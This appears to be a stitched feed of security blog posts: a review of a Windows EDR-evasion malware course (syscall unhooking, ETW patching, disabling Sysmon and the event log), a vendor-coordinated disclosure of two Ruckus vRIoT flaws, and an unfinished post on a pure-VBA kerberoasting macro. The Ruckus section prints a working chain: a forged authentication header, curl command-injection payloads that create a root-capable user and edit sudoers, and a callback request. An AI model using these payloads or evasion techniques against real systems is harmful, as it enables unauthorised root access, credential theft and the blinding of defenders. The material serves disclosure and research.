Downloading and Exploring AWS EBS Snapshots
The post Downloading and Exploring AWS EBS Snapshots appeared first on Rhino Security Labs.
Another Sektor7 course, another review! This time it’s the RED TEAM Operator: Windows Evasion Course. You can catch my previous reviews of the RTO: Malware Development Essentials and RTO: Malware Development Intermediate courses as well.
This course, like the previous ones, builds on the knowledge gained in the previous courses. You don’t need to have taken the others if you already have a background in malware development, C++, assembly, and debugging, but if you haven’t, this will very likely be too advanced. The Essentials course might be much more your speed.
Here’s what Windows Evasion covers, according to the course page:
- How a modern detection looks like
- How to get rid of process' internal operations monitoring
- How to make your payload look benign in memory
- How to break process parent-child relation
- How to disrupt EPP/EDR logging
- What is Sysmon and how to bypass it
The course is split into 3 main sections: essentials, non-privileged user vector, and high-privileged user vector. I’ll cover each one, and then provide some thoughts on the course as a whole and the value it provides.
The course begins as usual, with links to the code and a custom VM with all the tools you’ll need. The first lesson is detail on how modern EDR detection works, covering the different user-mode and kernel-mode components, static analysis, DLL injection, hooking, kernel callbacks, logging, and machine learning. This is as good an overview of the end to end setup of EDRs as I’ve seen. It lays the foundation for the subsequent topics in a nice logical way. It also covers the differences between EDRs and AV, how Sysmon fits in, and how the line between AV and EDRs is becoming more blurred.
Next in essentials, the focus is on defeating various static analysis techniques, specifically entropy, image file details, and code signing. The idea is to make your malicious binary as similar to known-good binaries as possible, with special attention paid to the elements that are commonly flagged by static analysis. None of this is ground-breaking or totally novel, but it does drive home the idea that details matter, and they can add up to successfully achieving execution on a target or being caught.
The second section covers a range of techniques that can be performed without needing elevated privileges. It begins with an explanation and demonstration via debugger of system call hooking, as performed by the main AV/EDR stand-in for the course, Bitdefender. Bitdefender is a good option here, as a trial license is freely available, and it does more EDR-like things than a normal AV, like hooking.
Next, several different methods of defeating user-mode hooking are demonstrated, beginning with the classic overwriting of the .text section of ntdll.dll, which I’ve also covered here. The main disadvantage of this method is the need to map an additional new copy of ntdll.dll into the process address space, which is rather unusual from an AV/EDR perspective.
One alternative to this is to use Hell’s Gate, by Am0nsec and Smelly. This method uses some clever assembly to dynamically resolve the syscall number of a given function from the local copy of ntdll.dll and execute it. However, this method has some drawbacks as well, mainly the fact that it will fail if the function to be resolved has already been hooked.
Reenz0h has a neat new modification (new to me at least!) to Hell’s Gate that gets around this problem, which he calls Halo’s Gate. It takes advantage of the fact that the system calls contained within ntdll.dll are sorted in numerically ascending order. The trick is to identify that a syscall has been hooked by checking for the jmp opcode (0xE9), and then traversing ntdll.dll both ahead of and behind the target syscall. If an unhooked syscall is found 8 functions after the target, and its value is 0xFD, then by subtracting 8 from 0xFD, the resulting 0xF5 is our target syscall number. The same applies for a syscall before the target function, except that the distance is added rather than subtracted. As no EDR hooks every syscall, eventually a clean one will be found and the target syscall number can be successfully calculated. This property of ordered syscall numbers in ntdll.dll is exploited to great effect in SysWhispers2. It was originally documented by the prolific modexp in a blog post here.
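To make the neighbour arithmetic concrete, here is a minimal Python sketch that runs the search over a simulated table of stubs rather than a real ntdll.dll. The stub layout (mov r10, rcx; mov eax, SSN), the helper names, and the table itself are assumptions for illustration, and the stubs are assumed to sit in syscall-number order as described above.

```python
# Simulated x64 syscall stubs. A clean stub is assumed to begin with
#   4C 8B D1        mov r10, rcx
#   B8 xx xx 00 00  mov eax, <syscall number>
# A hooked stub is assumed to begin with a jmp (0xE9).
CLEAN_PREFIX = bytes([0x4C, 0x8B, 0xD1, 0xB8])
JMP_OPCODE = 0xE9


def clean_stub(ssn):
    """Build a simulated unhooked stub carrying the given syscall number."""
    return CLEAN_PREFIX + ssn.to_bytes(4, "little")


def hooked_stub():
    """Build a simulated hooked stub (jmp plus a dummy displacement)."""
    return bytes([JMP_OPCODE, 0, 0, 0, 0, 0, 0, 0])


def read_ssn(stub):
    """Return the syscall number of a clean stub, or None if it looks hooked."""
    if stub[0] == JMP_OPCODE or stub[:4] != CLEAN_PREFIX:
        return None
    return int.from_bytes(stub[4:8], "little")


def resolve_ssn(stubs, target):
    """Walk outwards from the target until a clean neighbour is found."""
    for distance in range(len(stubs)):
        for step in (distance, -distance):
            index = target + step
            if 0 <= index < len(stubs):
                ssn = read_ssn(stubs[index])
                if ssn is not None:
                    # A neighbour `step` slots away differs by `step`.
                    return ssn - step
    return None


# Hypothetical table: slot i holds syscall 0xEB + i, slots 0..17 are hooked,
# so the first clean stub seen from slot 10 is 8 slots ahead (0xFD).
stubs = [hooked_stub() if i <= 17 else clean_stub(0xEB + i) for i in range(24)]
resolved = resolve_ssn(stubs, 10)
```

In this toy table the clean neighbour carries 0xFD and sits 8 slots after the target, so the search yields 0xFD - 8 = 0xF5, the same numbers as the example in the text.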
The last method of unhooking is a twist on the first, named, and I quote, “Perun’s Fart”. The goal is to get a clean copy of ntdll.dll without mapping it into our process again. It turns out that if a process is created in a suspended state, ntdll.dll is mapped by the Windows loader as part of the normal new process creation flow, but EDR hooks are not applied, since the main thread has not yet begun execution. So we can steal its copy of ntdll.dll and overwrite our local hooked version. Obviously this is a trade off, as this method will create a new process and involve cross-process memory reads. Still, it’s good to have multiple options when it comes to unhooking.
Next up is coverage of Event Tracing for Windows (ETW), how it can rat you out to AV/EDR, and how to blind it in your local process. ETW is especially relevant when executing .NET assemblies, such as in Cobalt Strike’s execute-assembly, as it can inform defenders of the exact assembly name and methods executed. The solution in this case is simple: patch the EtwEventWrite function to return early with 0 in the RAX register. Any time an ETW event is sent by the process, the call will appear to succeed without actually sending the message. Sweet and simple.
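As a rough illustration of what "return early with 0 in RAX" means at the byte level, the sketch below overwrites the start of a simulated function body with the x64 encoding of xor rax, rax; ret. It only touches a Python bytearray. The prologue bytes and the helper name are made up for the example, and the exact patch used in the course may differ.

```python
# x64 machine code for:  xor rax, rax ; ret
PATCH = bytes([0x48, 0x33, 0xC0, 0xC3])


def patch_function_start(code: bytearray) -> bytearray:
    """Overwrite the first bytes of a simulated function body with PATCH."""
    if len(code) < len(PATCH):
        raise ValueError("function body is shorter than the patch")
    code[:len(PATCH)] = PATCH
    return code


# Stand-in bytes for a function prologue; not taken from a real ntdll.dll.
simulated = bytearray(b"\x4c\x8b\xdc\x48\x83\xec\x58\x90")
patched = patch_function_start(simulated)
```

Anything after the four patched bytes is left untouched, since execution never reaches it once the function returns immediately.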
The last few videos of Section 2 cover different methods of hiding some specific indicators that can reveal the presence of malicious activity. First is module stomping. This is a way of executing shellcode from within a loaded DLL, avoiding the telltale sign of memory allocations within the process that are not backed by files on disk. A DLL that the host process does not use is loaded, then partially hollowed out and replaced with shellcode. Since the original DLL is properly loaded, no indication of injected shellcode is present.
Lastly, this section covers hiding parent-child process ID relationships. The usual method is covered for PPID spoofing, using UpdateProcThreadAttribute to set the PPID to an arbitrary parent process. However, two other methods I’d not encountered were covered as well. First, it turns out that processes created by the Windows task scheduler become children of the task scheduler svchost.exe process, and code is provided to use the Win32 API to execute a payload this way. The other method is one used by Emotet, which uses COM to programmatically run WMI and create a new process. The parent in this case is the WmiPrvSE.exe process.
This section covers a variety of techniques that are available in high-privilege contexts. The focus is on Windows Eventlog, interrupting AV/EDR network communication, and Sysmon.
One video covers a method of hiding your activities from the Windows Eventlog. The idea is that the service responsible for Eventlog, Windows Event Log, has several threads that handle the processing of event log messages. By suspending these threads, the service continues to run, but does not process any events, thus hiding our activity. One caveat is that if the threads are resumed, all events that were missed in the interim will be processed, unless the machine is rebooted.
The next section looks at severing the connection between AV/EDR and its remote monitoring/logging server. This is done in two primary ways: adding Windows Firewall rules, and sink-holing traffic via the routing table. These two are pretty self-explanatory, but the real value here is the code samples provided for doing this in C/C++. The infamous and terrible COM is used in several places, and provides a good working example of COM programming. Creating routing table entries is actually a simple Win32 API call away.
The final section of the course covers identifying and neutralizing Sysmon. Sysmon is an excellent tool and frequently the backbone of many AV/EDR collection strategies, so identifying its presence and disabling its capabilities can go a long way in hiding your activities.
One problem for attackers is that Sysmon by design can be concealed in various ways. The name of the user-mode process, the minifilter driver name, and its altitude can all be modified to hide Sysmon’s presence. However, there are enough reliable ways, like checking registry keys, to identify it. Code and commands are provided to find the registry keys and several techniques for shutting down Sysmon as well. One is to unload the minifilter driver. Another harks back to earlier in the course and shows how to patch our friend EtwEventWrite.
If you’ve read my other reviews of Sektor7 courses, you know what I’m going to say here. They are fantastic, and a fantastic value for the money as well, as most are around $200-250 USD. You can buy all 5 current courses for less than almost any other training out there, and 2573 times less than a single SANS course. You get lifetime access, and most importantly, the code samples. This to me is by far the single most valuable part of the course. Reenz0h is a great instructor with a wealth of knowledge and a great presentation style, but the true gift he gives you is a firm foundation of working code samples to build from and the context of how they are used. This course specifically covers basic COM programming in as understandable a way as COM can be covered, in my opinion. I’ve found that I learn best when I have some working code to tweak, play with, look up its functions on MSDN, and mold until it does what I want. No, the samples are not production ready and undetectable in every case, but these courses give you the tools to make them that way and integrate them into your own tooling.
Props again to reenz0h and the Sektor7 crew. I’m glad they took a poll of their students and delivered a more advanced course. I get the feeling there is a ton more advanced material they could crank out, and I can’t wait for it.
Dear Fellowlship, today’s homily is about two vulnerabilities (CVE-2020-26878 and CVE-2020-26879) found in Ruckus vRIoT, that can be chained together to get remote command execution as root. Please, take a seat and listen to the story.
We reported the vulnerability to the Ruckus Product Security Team this summer (26/Jul/2020) and they instantly checked and acknowledged the issues. After that, both parties agreed to set the disclosure date to October the 26th (90 days). We have to say that the team was really nice to us and that they kept us informed every month. If only more vendors had the same good faith.
Every day more people are turning their homes into “Smart Homes”, so we are developing an immeasurable desire to find vulnerabilities in components that manage IoT devices in some way. We discovered the “Ruckus IoT Suite” and wanted to hunt for some vulnerabilities. We focused on Ruckus IoT Controller (Ruckus vRIoT), which is a virtual component of the “IoT Suite” in charge of integrating IoT devices and IoT services via exposed APIs.
This software is provided as a VM in OVA format (Ruckus IoT 1.5.1.0.21 (GA) vRIoT Server Software Release), so it can be run by VMware and VirtualBox. This is a good way of obtaining and analyzing the software, as it serves as a testing platform.
Our first step is to perform a bit of recon to check the attack surface, so we run the OVA inside a hypervisor and execute a simple port scan to list exposed services:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack nginx
443/tcp open ssl/http syn-ack nginx
4369/tcp open epmd syn-ack Erlang Port Mapper Daemon
5216/tcp open ssl/http syn-ack Werkzeug httpd 0.12.1 (Python 3.5.2)
5672/tcp open amqp syn-ack RabbitMQ 3.5.7 (0-9)
9001/tcp filtered tor-orport no-response
25672/tcp open unknown syn-ack
27017/tcp filtered mongod no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
There are some interesting services. If we try to log in via SSH (admin/admin), we obtain a restricted menu where we can barely do anything:
1 - Ethernet Network
2 - System Details
3 - NTP Setting
4 - System Operation
5 - N+1
6 - Comm Debugger
x - Log Off
So our next step should be to get access to the filesystem and understand how this software works. We could not jailbreak the restricted menu, so we need to extract the files in a less fancy way: let’s sharpen our claws to gut the vmdk files.
In the end an OVA file is just a package that holds all the components needed to virtualize a system, so we can extract its contents and mount the virtual machine disk with the help of qemu and the NBD driver.
7z e file.ova
sudo modprobe nbd
sudo qemu-nbd -r -c /dev/nbd1 file.vmdk
sudo mount /dev/nbd1p1 /mnt
If that worked you can now access the whole filesystem:
psyconauta@insulanova:/mnt|⇒ ls
bin data home lib64 mqtt-broker root srv usr VRIOT
boot dev initrd.img lost+found opt run sys var vriot.d
cafiles etc lib mnt proc sbin tmp vmlinuz
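Since an OVA is a tar archive under the hood, the extraction step can also be scripted. The following is a small sketch using Python's standard tarfile module to list the virtual disks inside an OVA before handing them to qemu-nbd. The function names are ours, and the archive path is whatever file you downloaded.

```python
import tarfile


def list_ova_members(ova_path):
    """Return the names of all files packed inside the OVA (a tar archive)."""
    with tarfile.open(ova_path, "r") as ova:
        return [member.name for member in ova.getmembers()]


def find_disks(ova_path):
    """Return only the VMDK disk images contained in the OVA."""
    return [name for name in list_ova_members(ova_path)
            if name.lower().endswith(".vmdk")]


def extract_disks(ova_path, destination):
    """Extract the VMDK members to `destination` and return their names."""
    disks = find_disks(ova_path)
    with tarfile.open(ova_path, "r") as ova:
        for name in disks:
            ova.extract(name, path=destination)
    return disks
```

Calling find_disks("file.ova") should return the same .vmdk name that 7z produced in the commands above.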
We can see in the /etc/passwd file that the user “admin” does not have a regular shell:
admin:x:1001:1001::/home/admin:/VRIOT/ops/scripts/ras
That ras file is a bash script that corresponds to the restricted menu that we saw before.
BANNERNAME=" Ruckus IoT Controller"
MENUNAME=" Main Menu"
if [ $TERM = "ansi" ]
then
set TERM=vt100
export TERM
fi
main_menu () {
draw_screen
get_input
check_input
if [ $? = 10 ] ; then main_menu ; fi
}
##------------------------------------------------------------------------------------------------
draw_screen () {
clear
echo "*******************************************************************************"
echo "$BANNERNAME"
echo "$MENUNAME"
echo "*******************************************************************************"
echo ""
echo "1 - Ethernet Network"
echo "2 - System Details"
echo "3 - NTP Setting"
echo "4 - System Operation"
echo "5 - N+1"
echo "6 - Comm Debugger"
echo "x - Log Off"
echo
echo -n "Enter Choice: "
}
...
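Going back to the /etc/passwd check that led us to this script: spotting accounts with a non-standard login shell is easy to automate once the disk is mounted. Below is a minimal sketch. The list of "standard" shells is our own assumption and should be adjusted to the target distribution.

```python
# Shells we consider unremarkable; this set is an assumption, not exhaustive.
STANDARD_SHELLS = {
    "/bin/sh", "/bin/bash", "/bin/dash", "/bin/false", "/bin/sync",
    "/sbin/nologin", "/usr/sbin/nologin",
}


def unusual_shells(passwd_text):
    """Map user name -> login shell for accounts with a non-standard shell."""
    found = {}
    for line in passwd_text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7:
            continue  # skip blank or malformed lines
        name, shell = fields[0], fields[6]
        if shell and shell not in STANDARD_SHELLS:
            found[name] = shell
    return found


sample = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
admin:x:1001:1001::/home/admin:/VRIOT/ops/scripts/ras
"""
suspicious = unusual_shells(sample)
```

On the sample above only the admin account is reported, pointing straight at the ras script.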
Usually all these IoT routers/switches/etc with web interface contain functions that execute OS commands using user-controlled input. That means that if the input is not correctly sanitized, we can inject arbitrary commands. This is the lowest hanging fruit that always has to be checked, so our first task is to find the files related to the web interface:
psyconauta@insulanova:/mnt/VRIOT|⇒ find -iname "*web*" 2> /dev/null
./frontend/build/static/media/fontawesome-webfont.912ec66d.svg
./frontend/build/static/media/fontawesome-webfont.af7ae505.woff2
./frontend/build/static/media/fontawesome-webfont.674f50d2.eot
./frontend/build/static/media/fontawesome-webfont.b06871f2.ttf
./frontend/build/static/media/fontawesome-webfont.fee66e71.woff
./ops/packages_151/node_modules/faye-websocket
./ops/packages_151/node_modules/faye-websocket/lib/faye/websocket.js
./ops/packages_151/node_modules/faye-websocket/lib/faye/websocket
./ops/packages_151/node_modules/node-red-contrib-kontakt-io/node_modules/ws/lib/WebSocketServer.js
./ops/packages_151/node_modules/node-red-contrib-kontakt-io/node_modules/ws/lib/WebSocket.js
./ops/packages_151/node_modules/node-red-contrib-kontakt-io/node_modules/mqtt/test/websocket_client.js
./ops/packages_151/node_modules/node-red-contrib-kontakt-io/node_modules/websocket-stream
./ops/packages_151/node_modules/sockjs/lib/webjs.js
./ops/packages_151/node_modules/sockjs/lib/trans-websocket.js
./ops/packages_151/node_modules/websocket-extensions
./ops/packages_151/node_modules/websocket-extensions/lib/websocket_extensions.js
./ops/packages_151/node_modules/node-red-contrib-web-worldmap
./ops/packages_151/node_modules/node-red-contrib-web-worldmap/worldmap/leaflet/font-awesome/fonts/fontawesome-webfont.woff
./ops/packages_151/node_modules/node-red-contrib-web-worldmap/worldmap/leaflet/font-awesome/fonts/fontawesome-webfont.svg
./ops/packages_151/node_modules/node-red-contrib-web-worldmap/worldmap/leaflet/font-awesome/fonts/fontawesome-webfont.woff2
./ops/packages_151/node_modules/websocket-driver
./ops/packages_151/node_modules/websocket-driver/lib/websocket
./ops/docker/webservice
./ops/docker/webservice/web_functions.py
./ops/docker/webservice/web_functions_helper.py
./ops/docker/webservice/web.py
This way we identified several web-related files, and that the web interface is built on top of Python scripts. In Python there are lots of dangerous functions that, when used incorrectly, can lead to arbitrary code/command execution. The easy way is to try to find os.system() calls with user-controlled data in the main web file. A simple grep will shed light:
psyconauta@insulanova:/mnt/VRIOT|⇒ grep -i "os.system" ./ops/docker/webservice/web.py -A 5 -B 5
reqData = json.loads(request.data.decode())
except Exception as err:
return Response(json.dumps({"message": {"ok": 0,"data":"Invalid JSON"}}), 200)
userpwd = 'useradd '+reqData['username']+' ; echo "'+reqData['username']+':'+reqData['password']+'" | chpasswd >/dev/null 2>&1'
#call(['useradd ',reqData['username'],'; echo',userpwd,'| chpasswd'])
os.system(userpwd)
call(['usermod','-aG','sudo',reqData['username']],stdout=devNullFile)
except Exception as err:
print("err=",err)
devNullFile.close()
return errorResponseFactory(str(err), status=400)
--
slave_ip = reqData['slave_ip']
if reqData['slave_ip'] != config.get("vm_ipaddress"):
master_ip = reqData['slave_ip']
slave_ip = reqData['master_ip']
crontab_str = "crontab -l | grep -q 'ha_slave.py' || (crontab -l ; echo '*/5 * * * * python3 /VRIOT/ops/scripts/haN1/ha_slave.py 1 "+master_ip+" "+slave_ip+" >> /var/log/cron_ha.log 2>&1') | crontab -"
os.system(crontab_str)
#os.system("python3 /VRIOT/ops/scripts/haN1/n1_process.py > /dev/null 2>&1 &")
except Exception as err:
devNullFile.close()
return errorResponseFactory(str(err), status=400)
else:
devNullFile.close()
--
call(['rm','-rf','/etc/corosync/authkey'],stdout=devNullFile)
call(['rm','-rf','/etc/corosync/corosync.conf'],stdout=devNullFile)
call(['rm','-rf','/etc/corosync/service.d/pcmk'],stdout=devNullFile)
call(['rm','-rf','/etc/default/corosync'],stdout=devNullFile)
crontab_str = "crontab -l | grep -v 'ha_slave.py' | crontab -"
os.system(crontab_str)
cmd = "supervisorctl status all | awk '{print $1}'"
process_list = check_output(cmd,shell=True).decode('utf-8').split("\n")
for process in process_list:
if process and process != 'nplus1_service':
--
call(['service','sshd','stop'])
config.update("vm_ssh_enable","0")
call(['supervisorctl','restart','app:mqtt_service'])
call(['supervisorctl', 'restart', 'celery:*'])
if reqData["vm_ssh_enable"] == "0":
os.system("kill $(ps aux | grep 'ssh' | awk '{print $2}')")
except Exception as err:
return Response(json.dumps({"message": {"ok": 0,"data":"Invalid JSON"}}), 200)
elif request.method == 'GET':
response_json = {
"offline_upgrade_enable" : config.get("offline_upgrade_enable"),
The first occurrence already looks vulnerable to command injection. When checking that code snippet we can observe that it is in fact vulnerable:
@app.route("/service/v1/createUser",methods=['POST'])
@token_required
def create_ha_user():
    try:
        devNullFile = open(os.devnull, 'w')
        try:
            reqData = json.loads(request.data.decode())
        except Exception as err:
            return Response(json.dumps({"message": {"ok": 0,"data":"Invalid JSON"}}), 200)
        userpwd = 'useradd '+reqData['username']+' ; echo "'+reqData['username']+':'+reqData['password']+'" | chpasswd >/dev/null 2>&1'
        #call(['useradd ',reqData['username'],'; echo',userpwd,'| chpasswd'])
        os.system(userpwd)
        call(['usermod','-aG','sudo',reqData['username']],stdout=devNullFile)
    except Exception as err:
        print("err=",err)
        devNullFile.close()
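Grep finds every os.system() call, including the harmless ones with constant strings. As a complement, here is a rough sketch that uses Python's ast module to report only the calls whose first argument is not a string literal. It is a heuristic of our own (it does not track where the data comes from), and the sample source is a trimmed stand-in, not the real web.py.

```python
import ast


def find_dynamic_os_system(source):
    """Return line numbers of os.system() calls with a non-literal argument."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call) or not node.args:
            continue
        func = node.func
        is_os_system = (
            isinstance(func, ast.Attribute)
            and func.attr == "system"
            and isinstance(func.value, ast.Name)
            and func.value.id == "os"
        )
        if not is_os_system:
            continue
        arg = node.args[0]
        if not (isinstance(arg, ast.Constant) and isinstance(arg.value, str)):
            hits.append(node.lineno)
    return sorted(hits)


SAMPLE = '''
import os
def create(req):
    userpwd = 'useradd ' + req['username']
    os.system(userpwd)
    os.system("kill 1")
'''
dynamic_calls = find_dynamic_os_system(SAMPLE)
```

In the sample, the call fed by the concatenated userpwd string is flagged, while the constant "kill 1" call is ignored.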
We can see how, when calling the /service/v1/createUser endpoint, some parameters are directly taken from the POST request body (JSON-formatted) and concatenated to a os.system() call. As this concatenation is done without proper sanitization, we can inject arbitrary commands with ;. The vulnerability is easily confirmed using an HTTP server (python -m SimpleHTTPServer) as canary:
curl https://host/service/v1/createUser -k --data '{"username": ";curl http://TARGET:8000/pwned;#", "password": "test"}' -H "Authorization: Token 47de1a54fa004793b5de9f5949cf8882" -H "Content-Type: application/json"
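To see why the payload works, we can rebuild the command string exactly as create_ha_user() does, without executing anything. The sketch below mirrors the concatenation from the snippet. The helper name is ours, and the shlex.quote() line only illustrates how the same input would look once escaped; it is not the vendor's fix.

```python
import shlex


def build_useradd_command(username, password):
    """Reproduce the string concatenation used by the vulnerable endpoint."""
    return ('useradd ' + username + ' ; echo "' + username + ':' + password
            + '" | chpasswd >/dev/null 2>&1')


payload = ';curl http://TARGET:8000/pwned;#'

# What the shell receives: useradd runs with no argument, then curl runs,
# and the trailing '#' turns the rest of the line into a comment.
command = build_useradd_command(payload, "test")

# The same input after shell escaping becomes one inert argument.
quoted = shlex.quote(payload)
```

Printing command makes the injection obvious: the attacker-controlled curl sits between two separators as a command of its own.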
Keep in mind that this method checks for a valid token (see the @token_required at line two of the snippet), so we need to be authenticated in order to exploit it. Our next step is to find a way to circumvent this check to get an RCE as an unauthenticated user.
The first step to find a bypass would be to check the token_required function in order to understand how this “check” is performed:
def token_required(f):
    @wraps(f)
    def wrapper(*args, **kwargs):
        # Localhost Authentication
        if(request.headers.get('X-Real-Ip') == request.headers.get('host')):
            return f()
        # init call
        if(request.path == '/service/init' and request.method == 'POST'):
            return f()
        if(request.path == '/service/upgrade/flow' and request.method == 'POST'):
            return f()
        # N+1 Authentication
        if "Token " not in request.headers.get('Authorization'):
            print('Auth='+request.headers.get('Authorization'))
            token = crpiot_obj.decrypt(request.headers.get('Authorization'))
            print('Token='+token)
            with open("/VRIOT/ops/scripts/haN1/service_auth") as fileobj:
                auth_code = fileobj.read().rstrip()
            if auth_code == token:
                return f()
        # Normal Authentication
        k = requests.get("https://0.0.0.0/app/v1/controller/stats",headers={'Authorization': request.headers.get('Authorization')},verify=False)
        if(k.status_code != 200):
            return Response(json.dumps({"detail": "Invalid Token."}), 401)
        else:
            return f()
    return wrapper
Let’s ignore the header comparison :) and focus on the N+1 authentication. As you can see, if the Authorization header does not contain the word “Token”, the header value is decrypted and compared with a hardcoded value from a file (/VRIOT/ops/scripts/haN1/service_auth). The encryption / decryption routines can be found in the file /VRIOT/ops/scripts/enc_dec.py:
def __init__(self, salt='nplusServiceAuth'):
    self.salt = salt.encode("utf8")
    self.enc_dec_method = 'utf-8'
    self.str_key=config.get('n1_token').encode("utf8")
def encrypt(self, str_to_enc):
    try:
        aes_obj = AES.new(self.str_key, AES.MODE_CFB, self.salt)
        hx_enc = aes_obj.encrypt(str_to_enc.encode("utf8"))
        mret = b64encode(hx_enc).decode(self.enc_dec_method)
        return mret
    except ValueError as value_error:
        if value_error.args[0] == 'IV must be 16 bytes long':
            raise ValueError('Encryption Error: SALT must be 16 characters long')
        elif value_error.args[0] == 'AES key must be either 16, 24, or 32 bytes long':
            raise ValueError('Encryption Error: Encryption key must be either 16, 24, or 32 characters long')
        else:
            raise ValueError(value_error)
The n1_token value can be found by grepping (spoiler: it is serviceN1authent). With all this information we can go to our Python console and create the magic value:
>>> from Crypto.Cipher import AES
>>> from base64 import b64encode, b64decode
>>> salt='nplusServiceAuth'
>>> salt = salt.encode("utf8")
>>> enc_dec_method = 'utf-8'
>>> str_key = 'serviceN1authent'
>>> aes_obj = AES.new(str_key, AES.MODE_CFB, salt)
>>> hx_enc = aes_obj.encrypt('TlBMVVMx'.encode("utf8"))# From /VRIOT/ops/scripts/haN1/service_auth
>>> mret = b64encode(hx_enc).decode(enc_dec_method)
>>> print mret
OlDkR+oocZg=
So setting the Authorization header to OlDkR+oocZg= is enough to bypass the token check and to interact with the API. We can combine this backdoor with our remote command injection:
curl https://host/service/v1/createUser -k --data '{"username": ";useradd \"exploit\" -g 27; echo \"exploit\":\"pwned\" | chpasswd >/dev/null 2>&1;sed -i \"s/Defaults rootpw/ /g\" /etc/sudoers;#", "password": "test"}' -H "Authorization: OlDkR+oocZg=" -H "Content-Type: application/json"
And now log in:
X-C3LL@Kumonga:~|⇒ ssh [email protected]
[email protected]'s password:
Could not chdir to home directory /home/exploit: No such file or directory
$ sudo su
[sudo] password for exploit:
root@vriot:/# id
uid=0(root) gid=0(root) groups=0(root)
So… PWNED! >:). We have a shiny unauthenticated RCE as root.
Maybe the vulnerability was easy to spot and easy to exploit, but a root shell is a root shell. And nobody can argue with you when you have a root shell.
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is about how a soul descended into the VBA hell and ended up creating juicy tools. Please, take a seat and listen to the story.
Exposing yourself too much to VBA can be dangerous for your mind and your body. Please talk with your doctor before starting to code something in such crooked language.
Using macros as the first stage of an attack is probably the Top One of tactics. Macros are usually used to deploy implants in order to infect computers, so that attackers can use these first boxes as pivot points and interact with the internal network. Recently a thought started haunting our heads: can we pwn something without dropping any binary or injecting code, just launching attacks via Excel files? If time is not a constraint we can send different emails over time with attacks implemented in pure VBA (recon, bruteforcing, kerberoast/asreproast, ACLpwns, etc.).
For example, we can create a macro that interacts with a domain controller via LDAP to retrieve the userlist and exfiltrate the attributes sAMAccountName and pwdLastSet. We can turn the pwdLastSet to something like “Monthyear” (June2020, July2020…) and build a list of usernames and plausible passwords to bruteforce the VPN login. We would only need to send the macro via email to a bunch of employees and wait for the goodies.
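The pwdLastSet attribute is stored as a Windows FILETIME, that is, the number of 100-nanosecond intervals since 1601-01-01 (UTC). A minimal sketch of the “Monthyear” conversion, once the values have been exfiltrated, could look like this. The function name is ours, and a value of 0 (password must be changed at next logon) is simply skipped.

```python
from datetime import datetime, timedelta

FILETIME_EPOCH = datetime(1601, 1, 1)
MONTHS = ["January", "February", "March", "April", "May", "June", "July",
          "August", "September", "October", "November", "December"]


def pwd_last_set_to_candidate(pwd_last_set):
    """Turn a pwdLastSet FILETIME value into a 'MonthYear' password guess."""
    if pwd_last_set <= 0:
        return None  # never set, or flagged for change at next logon
    # FILETIME counts 100 ns ticks; 10 ticks make one microsecond.
    changed = FILETIME_EPOCH + timedelta(microseconds=pwd_last_set // 10)
    return f"{MONTHS[changed.month - 1]}{changed.year}"


def build_wordlist(users):
    """Pair each sAMAccountName with its candidate, skipping empty ones."""
    pairs = []
    for name, pwd_last_set in users.items():
        candidate = pwd_last_set_to_candidate(pwd_last_set)
        if candidate:
            pairs.append((name, candidate))
    return pairs
```

Month names are hardcoded rather than taken from strftime so the output does not depend on the locale of the machine doing the conversion.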
Following this idea of hacking in an epistolary way, we started to create a macro for kerberoasting. We saw that the internet is full of macros that execute kerberoast attacks, but all of them either drop a binary, inject shellcode, or just call PowerShell. We wanted to build something in pure VBA. So… let’s go!
This kind of attack is really well explained in tons of articles over the internet, so we are not going to go into such detail here. As a briefing we are going to quote the article Kerberos (I): How does Kerberos work? – Theory from our friend @zer1t0:
Kerberoasting is a technique which takes advantage of TGS to crack the user accounts passwords offline. As seen above, TGS comes encrypted with service key, which is derived from service owner account NTLM hash. Usually the owners of services are the computers in which the services are being executed. However, the computer passwords are very complex, thus, it is not useful to try to crack those. This also happens in case of krbtgt account, therefore, TGT is not crackable neither. All the same, on some occasions the owner of service is a normal user account. In these cases it is more feasible to crack their passwords. Moreover, this sort of accounts normally have very juicy privileges. Additionally, to get a TGS for any service only a normal domain account is needed, due to Kerberos not perform authorization checks.
So we need to create a macro that solves two tasks: to list the SPNs whose authentication is related to a user account, and to ask for a TGS ticket for each one. To build our PoC we checked the source code of Mimikatz (kuhl_m_kerberos.c) and this old example of how to ask for TGS tickets in Windows (KList.c).
We are going to need to call three functions from ntsecapi. First we need to establish an untrusted connection with the LSA server using LsaConnectUntrusted, then we get the authentication package identifier for Kerberos (LsaLookupAuthenticationPackage), and finally we call LsaCallAuthenticationPackage to retrieve the target ticket.
We can check MSDN for information about what parameters those functions need. Of course VBA data types are wicked and can be a bit tricky, but with a bit of googling we can solve it:
Private Declare PtrSafe Function LsaConnectUntrusted Lib "SECUR32" (ByRef LsaHandle As LongPtr) As Long
Private Declare PtrSafe Function LsaLookupAuthenticationPackage Lib "SECUR32" (ByVal LsaHandle As LongPtr, ByRef PackageName As LSA_STRING, ByRef AuthenticationPackage As LongLong) As Long
Private Declare PtrSafe Function LsaCallAuthenticationPackage Lib "SECUR32" (ByVal LsaHandle As LongPtr, ByVal AuthenticationPackage As LongLong, ByVal ProtocolSubmitBuffer As LongPtr, ByVal SubmitBufferLength As Long, ProtocolReturnBuffer As Any, ByRef ReturnBufferLength As Long, ByRef ProtocolStatus As Long) As Long
As stated, types can be a bit tricky. In order to call LsaLookupAuthenticationPackage we need to use an LSA_STRING structure, defined as:
typedef struct _LSA_STRING {
USHORT Length;
USHORT MaximumLength;
PCHAR Buffer;
} LSA_STRING, *PLSA_STRING;
We don’t have those types in VBA, so we need to fit the structure fields to types with the same size. This structure can be declared as:
Private Type LSA_STRING
Length As Integer
MaximumLength As Integer
Buffer As String
End Type
So the first part of our subroutine to ask TGS tickets would be something like:
Sub askTGS(target As String)
    Dim Status As Long
    Dim pLogonHandle As LongPtr
    Dim Name As LSA_STRING
    Dim pPackageId As LongLong
    Status = LsaConnectUntrusted(pLogonHandle)
    If Status <> 0 Then
        MsgBox "Error, LsaConnectUntrusted failed!"
